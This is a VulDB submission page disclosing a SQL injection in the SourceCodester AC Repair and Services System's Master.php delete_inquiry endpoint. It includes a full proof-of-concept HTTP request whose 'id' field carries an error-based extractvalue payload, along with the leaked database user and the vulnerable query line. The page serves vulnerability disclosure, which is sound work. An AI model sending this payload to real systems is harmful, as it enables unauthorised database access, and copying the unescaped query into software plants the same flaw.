제출 #182578: SourceCodester AC Repair and Services System sql injection in Master.php 정보

제목	SourceCodester AC Repair and Services System sql injection in Master.php
설명	I find a SQL injection vulnerability in the SourceCodester AC Repair and Services System(https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html) This affect the file /classes/Master.php?f=delete_inquiry: POST /php-acrss/classes/Master.php?f=delete_inquiry HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------2854294418240524322736048278 Content-Length: 913 Origin: http://localhost Connection: close Referer: http://localhost/php-acrss/admin/?page=bookings/manage_booking Cookie: PHPSESSID=avms7d982mr3recfih6r7sfun0 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="id" 1' or (extractvalue(1,concat(0x7e,(select user()),0x7e)))# -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="fullname" 111 -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="email" [email protected] -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="contact" 111 -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="address" 111 -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="services[]" 1 -----------------------------2854294418240524322736048278 Content-Disposition: form-data; name="status" 0 -----------------------------2854294418240524322736048278-- And it returns "{"status":"failed","error":"XPATH syntax error: '~admin@localhost~'"}". This return value undoubtedly proves the existence of an SQL injection vulnerability here The vulnerability arises from the usage of the code "sql = "UPDATE inquiry_list set {data} where id = '{$id}' ";" without implementing adequate filtering on the controllable parameter id. This absence of proper filtering exposes the possibility of SQL injection attacks. To address this issue, my recommendation is to safeguard the id parameter against malicious exploitation by utilizing mysqli_real_escape_string().
원천	⚠️ https://www.sourcecodester.com/php/16513/ac-repair-and-services-system-using-php-and-mysql-source-code-free-download.html
사용자	L2ncE (UID 50751)
제출	2023. 07. 14. AM 05:29 (3 연령 ago)
모더레이션	2023. 07. 15. AM 09:29 (1 day later)
상태	수락
VulDB 항목	234223 [SourceCodester AC Repair and Services System 1.0 HTTP POST Request Master.php?f=delete_inquiry 아이디 SQL 주입]
포인트들	20

◂ 이전 개요 다음 ▸

Do you want to use VulDB in your project?

Use the official API to access entries easily!